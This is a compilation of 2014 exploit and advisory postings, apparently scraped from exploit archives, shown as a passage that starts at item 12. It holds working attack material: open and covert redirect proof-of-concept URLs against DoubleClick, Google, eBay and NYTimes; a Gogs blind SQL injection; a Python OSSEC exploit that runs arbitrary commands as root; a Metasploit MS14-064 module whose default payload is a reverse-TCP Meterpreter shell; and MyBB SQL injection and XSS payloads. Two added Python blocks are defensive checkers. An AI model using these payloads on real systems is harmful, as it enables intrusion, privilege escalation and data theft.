http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/ http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10 *(2.2) Vulnerable URLs Related to DoubleClick.net.* Vulnerable URLs 1: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml POC: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security Vulnerable URLs 2: http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd POC: http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security Vulnerable URLs 3: 
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com% POC: http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/ http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security ... We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers. *(2.3)* POC Video: https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be *(3) Google DoubleClick.net Can Adversely Affect Other Websites.* At the same time, Google DoubleClick.net can be used to do "Covert Redirect" to other websites, such as Google, eBay, The New York Times, etc.(Bypass other websites' Open Redirect filters) *(3.1)* Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/ POC: https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity More Details: Video: 
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be Blog: http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html *(3.2)* eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/ POC: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security More Details: Video: https://www.youtube.com/watch?v=a4H-u17Y9ks Blog: http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html *(3.3)* The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net Vulnerable URL: http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion POC: 
http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion

More Details:
Video: https://www.youtube.com/watch?v=3XtrUqzxNW0
Blog: http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html

These vulnerabilities were reported to Google earlier in 2014. But it seems that Google has not yet taken any action. All of the vulnerabilities are still unpatched.

Reporter: Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing

More Details:
http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/

Source: Google DoubleClick Open Redirect ≈ Packet Storm
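One way to see where such a chain actually ends, from the filtering side: the checker below follows the redirect carriers the advisory's URLs use (the adurl=, continue=, forward=, goto= and mpre= parameters and DoubleClick's "clk;...?http://target" form) through nested, percent-encoded hops and reports the final host. It is an added example, not code from the advisory or from Google; the sample URLs are constructed and shortened versions of the advisory's, with the long ai= tokens left out.

```python
"""Trace an ad-click / login redirect chain to its real destination.

Added example, not part of the advisory. A "covert redirect" hides the
off-site target inside a trusted-looking redirector URL, possibly several
layers deep; a filter that only looks at the first hop will wave it through.
Sample URLs below are constructed and shortened.
"""
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters that carry the next hop in the advisory's examples.
REDIRECT_PARAMS = ("adurl", "continue", "forward", "goto", "mpre")

# Hosts a site operator might accept as final destinations (constructed list).
ALLOWED_HOSTS = ("google.com", "doubleclick.net", "ebay.com", "nytimes.com")


def next_hop(url: str) -> Optional[str]:
    """Return the URL this redirector would forward to, or None if it is a leaf."""
    parts = urlsplit(url)
    # Form 1: ad.doubleclick.net/clk;...;w?http://target  (the query string IS the target)
    if parts.query.startswith(("http://", "https://")):
        return parts.query
    # Form 2: ad.doubleclick.net/click;...;;%3fhttp://target  ('?' is percent-encoded,
    # so the target hides inside the path until it is decoded)
    path = unquote(parts.path)
    marker = path.find("?http")
    if marker != -1:
        return path[marker + 1:]
    # Form 3: a named parameter whose (percent-decoded) value is a full URL
    qs = parse_qs(parts.query, keep_blank_values=True)
    for name in REDIRECT_PARAMS:
        for value in qs.get(name, []):
            if value.startswith(("http://", "https://")):
                return value
    return None


def trace(url: str, max_hops: int = 5) -> List[str]:
    """Follow next_hop() up to max_hops times; element 0 is the URL given."""
    chain = [url]
    for _ in range(max_hops):
        nxt = next_hop(chain[-1])
        if nxt is None:
            break
        chain.append(nxt)
    return chain


def final_host(url: str) -> str:
    return (urlsplit(trace(url)[-1]).hostname or "").lower()


def redirect_allowed(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """True only if the chain ends on an allowed host (exact or subdomain match)."""
    host = final_host(url)
    return any(host == a or host.endswith("." + a) for a in allowed)


# Constructed samples modelled on the advisory's URLs (shortened).
SAMPLES = {
    "clk": "http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security",
    "click": "http://ad.doubleclick.net/click;h=v2%7C4133;276061443;;%3fhttp://www.tetraph.com/security",
    "pixel": "http://cm.g.doubleclick.net/pixel?google_nid=rfi&forward=http%3A%2F%2Fwww.tetraph.com%2Fsecurity",
    "login": "https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net"
             "%2Faclk%3Fsa%3DL%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity",
    "nyt": "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet"
           "%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity",
    "benign": "https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/",
}

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        chain = trace(url)
        print(f"{name:7} hops={len(chain) - 1} final={final_host(url)} allowed={redirect_allowed(url)}")
```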
  12. Blind SQL Injection in Gogs label search
========================================

Researcher: Timo Schmid <tschmid@ernw.de>

Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1])
It is very similar to the GitHub hosting platform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users.

Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=

The labels parameter of this view is vulnerable to a blind SQL injection.

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)

CVE-ID
======
CVE-2014-8681

Impact
======
The vulnerability results at least in a complete compromise of the database. Depending on the particular database configuration a compromise of the system is also possible.

Status
======
Fixed by Vendor

Vulnerable Code Section
=======================
models/issue.go:

[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds, sortType string) ([]Issue, error) {
	sess := x.Limit(20, (page-1)*20)

	if rid > 0 {
		sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
	} else {
		sess.Where("is_closed=?", isClosed)
	}

	if uid > 0 {
		sess.And("assignee_id=?", uid)
	} else if pid > 0 {
		sess.And("poster_id=?", pid)
	}

	if mid > 0 {
		sess.And("milestone_id=?", mid)
	}

	if len(labelIds) > 0 {
		for _, label := range strings.Split(labelIds, ",") {
			sess.And("label_ids like '%$" + label + "|%'")
		}
	}
[...]

The vulnerability exists because of a string concatenation in the SQL query with user supplied data. An attacker is restricted to not use commas in the injection string as the program splits input at commas.

Proof of Concept
================
Test whether the version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or char_length(@@version) > 10 and '|%'='&type=all&state=

Returns all issues if true, none if false. This could be used to extract data with a binary search.

Solution
========
This vulnerability could easily be fixed by using prepared statements:
sess.And("label_ids like ?", "%$" + label + "|%")

Update to Version 0.5.6.1025.

Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746

Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned

Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>

References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5] http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt

Advisory-ID
===========
BC-1401

Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

--
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

Source: http://www.exploit-db.com/exploits/35237/
  13. #!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Vendor Homepage: http://www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC - 2.8
# Tested on: Ubuntu x86_64
# CVE : 2014-5284
# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1
# Run this on target machine and follow instructions to execute command as root

from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import signal


class HostDenyExploiter(object):

    def __init__(self, path_to_watch, cmd):
        self.path = path_to_watch
        self.notifier = inotify.INotify()
        self.exploit = cmd

    def create_files(self):
        print "=============================================="
        print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."
        for i in range(300, 65536):
            filename = "/tmp/hosts.deny.%s" % i
            f = open(filename, 'w')
            f.write("")
            f.close()

    def watch_files(self):
        print "=============================================="
        print "Monitoring tmp for file change...."
        print "ssh into the system a few times with an incorrect password"
        print "Then wait for up to 10 mins"
        print "=============================================="
        self.notifier.startReading()
        self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])

    def write_exploit_to_file(self, path):
        print 'Writing exploit to this file'
        f = open(str(path).split("'")[1], 'w')
        f.write(' sshd : ALL : twist %s \n' % self.exploit)
        f.close()
        print "=============================================="
        print " ssh in again to execute the command"
        print "=============================================="
        print " End Prog."
        os.kill(os.getpid(), signal.SIGUSR1)

    def on_file_change(self, watch, path, mask):
        print 'File: ', str(path).split("'")[1], ' has just been modified'
        self.notifier.stopReading()
        self.write_exploit_to_file(path)


if __name__ == '__main__':
    parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
    parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
    (options, args) = parser.parse_args()
    cmd = options.cmd
    if options.cmd is None:
        print parser.usage
        exit(0)
    ex = HostDenyExploiter('/tmp', cmd)
    ex.create_files()
    ex.watch_files()
    reactor.run()
    exit(0)

Source: OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation
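The bug class behind this exploit, shown from the fixing side: a predictable /tmp/hosts.deny.<n> opened for writing follows whatever file was planted at that name first, while exclusive creation or mkstemp does not. This is an added example, not part of the exploit above and not OSSEC's own code; the hosts.deny line, the planted file and the temporary directory are constructed.

```python
"""CVE-2014-5284 pattern: a predictable temp path versus exclusive creation.

Added example (not OSSEC code). The active-response script wrote its copy of
hosts.deny to a predictable /tmp/hosts.deny.<n> with a plain open-for-write,
which truncates and fills a file (or follows a symlink) that someone else put
at that name beforehand. The two safe variants either refuse an existing path
(O_CREAT|O_EXCL|O_NOFOLLOW) or let the OS pick an unpredictable name (mkstemp).
"""
import os
import tempfile
from typing import Dict

# What a host-deny response would write (constructed sample, RFC 5737 address).
DENY_LINE = "ALL: 198.51.100.7\n"


def write_predictable(dirpath: str, seq: int, content: str) -> str:
    """Vulnerable shape: fixed name, open(..., 'w') truncates whatever is already there."""
    path = os.path.join(dirpath, "hosts.deny.%d" % seq)
    with open(path, "w") as f:
        f.write(content)
    return path


def write_exclusive(dirpath: str, seq: int, content: str) -> str:
    """Same name, but creation is atomic and exclusive: raises FileExistsError if the
    path already exists, and O_NOFOLLOW (where the platform has it) refuses a symlink."""
    path = os.path.join(dirpath, "hosts.deny.%d" % seq)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(content)
    return path


def write_mkstemp(dirpath: str, content: str) -> str:
    """Preferred shape: unpredictable suffix, created O_EXCL with mode 0600."""
    fd, path = tempfile.mkstemp(prefix="hosts.deny.", dir=dirpath)
    with os.fdopen(fd, "w") as f:
        f.write(content)
    return path


def demo(dirpath: str = "") -> Dict[str, bool]:
    """Plant a file at the predictable name, then try each writer against it."""
    dirpath = dirpath or tempfile.mkdtemp(prefix="hostsdeny-demo-")
    planted = os.path.join(dirpath, "hosts.deny.300")
    with open(planted, "w") as f:          # pre-existing file under someone else's control
        f.write("planted\n")
    results: Dict[str, bool] = {}

    write_predictable(dirpath, 300, DENY_LINE)
    with open(planted) as f:               # the deny line landed in the planted file
        results["predictable_overwrote_planted"] = f.read() == DENY_LINE

    try:
        write_exclusive(dirpath, 300, DENY_LINE)
        results["exclusive_refused"] = False
    except FileExistsError:
        results["exclusive_refused"] = True

    fresh = write_mkstemp(dirpath, DENY_LINE)
    results["mkstemp_fresh_and_private"] = (
        fresh != planted and (os.stat(fresh).st_mode & 0o777) == 0o600
    )
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check:32} {ok}")
```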
  14. No offense
  15. This Metasploit module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as those using Office 2010 SP1 may be less stable, and may end up with a crash due to a failure in the CPackage::CreateTempFileName function.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
      'Description'    => %q{
        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing
        arbitrary code execution, bypassing the patch MS14-060, for the vulnerability publicly known as
        "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8,
        Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most
        reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. Please keep in mind
        that some other setups such as those using Office 2010 SP1 may be less stable, and may end up with a
        crash due to a failure in the CPackage::CreateTempFileName function.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Haifei Li',    # Vulnerability discovery and exploit technique
          'sinn3r',       # Metasploit module
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-6352'],
          ['MSB', 'MS14-064'],
          ['BID', '70690'],
          ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
        ],
      'Platform'       => 'python',
      'Arch'           => ARCH_PYTHON,
      'Targets'        =>
        [
          ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'DisclosureDate' => "Nov 12 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
      ], self.class)
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    payload_packager = create_packager('tabnanny.py', payload.encoded)
    trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
    zip = zip_ppsx(payload_packager, trigger_packager)
    file_create(zip)
  end

  def zip_ppsx(ole_payload, ole_trigger)
    zip_data = {}
    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
    Dir["#{data_dir}/**/**"].each do |file|
      unless File.directory?(file)
        zip_data[file.sub(data_dir,'')] = File.read(file)
      end
    end

    # add the otherwise skipped "hidden" file
    file = "#{data_dir}/_rels/.rels"
    zip_data[file.sub(data_dir,'')] = File.read(file)

    # put our own OLE streams
    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
    zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger

    # create the ppsx
    ppsx = Rex::Zip::Archive.new
    zip_data.each_pair do |k,v|
      ppsx.add_file(k,v)
    end

    ppsx.pack
  end

  def create_packager(file_name, contents)
    file_info = [2].pack('v')
    file_info << "#{file_name}\x00"
    file_info << "#{file_name}\x00"
    file_info << "\x00\x00"

    extract_info = [3].pack('v')
    extract_info << [file_name.length + 1].pack('V')
    extract_info << "#{file_name}\x00"

    file = [contents.length].pack('V')
    file << contents

    append_info = [file_name.length].pack('V')
    append_info << Rex::Text.to_unicode(file_name)
    append_info << [file_name.length].pack('V')
    append_info << Rex::Text.to_unicode(file_name)
    append_info << [file_name.length].pack('V')
    append_info << Rex::Text.to_unicode(file_name)

    ole_data = file_info + extract_info + file + append_info
    ole_contents = [ole_data.length].pack('V') + ole_data

    ole = create_ole("\x01OLE10Native", ole_contents)

    ole
  end

  def create_ole(stream_name, data)
    ole_tmp = Rex::Quickfile.new('ole')
    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)

    stm = stg.create_stream(stream_name)
    stm << data
    stm.close

    directory = stg.instance_variable_get(:@directory)
    directory.each_entry do |entry|
      if entry.instance_variable_get(:@_ab) == 'Root Entry'
        # 0003000C-0000-0000-c000-000000000046 # Packager
        clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
        entry.instance_variable_set(:@_clsId, clsid)
      end
    end

    # write to disk
    stg.close

    ole_contents = File.read(ole_tmp.path)
    ole_tmp.close
    ole_tmp.unlink

    ole_contents
  end
end

Source: MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python ≈ Packet Storm
  16. #Title: MyBB 1.8.X - Multiple Vulnerabilities
#Date: 13.11.2014
#Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
#Vendor: mybb.com
#Version: => 1.8.1 - Latest ATM
#Contact: smash@devilteam.pl
#Author: Smash_

Latest MyBB forum software suffers from multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow an attacker to perform remote SQL queries against the database, and so on. Sanitize your inputs.

1. SQL Injection

Vuln: POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#

#1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):

POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 408

regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register

#1 - Response:

HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:16:02 GMT

<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1054 - Unknown column '9' in 'order clause'</dd>
<dt>Query:</dt>
SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
</dd>

#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):

POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 409

regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register

#2 - Response:

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2014 15:21:15 GMT
(...)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Forums - Registration</title>

#3 - Request (Final POC):

POST /mybb-1.8.1/member.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 475

regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register

#3 - Response:

HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:24:34 GMT
(...)
<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
<dt>Query:</dt>
<dd>
SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
</dd>
</dl>
(...)

2. Cross Site Scripting

a) Reflected XSS - Report post

Vuln: GET 'type' - XSS"><script>alert(666)</script>
localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1

Request:

GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
Host: localhost

Response:

HTTP/1.1 200 OK
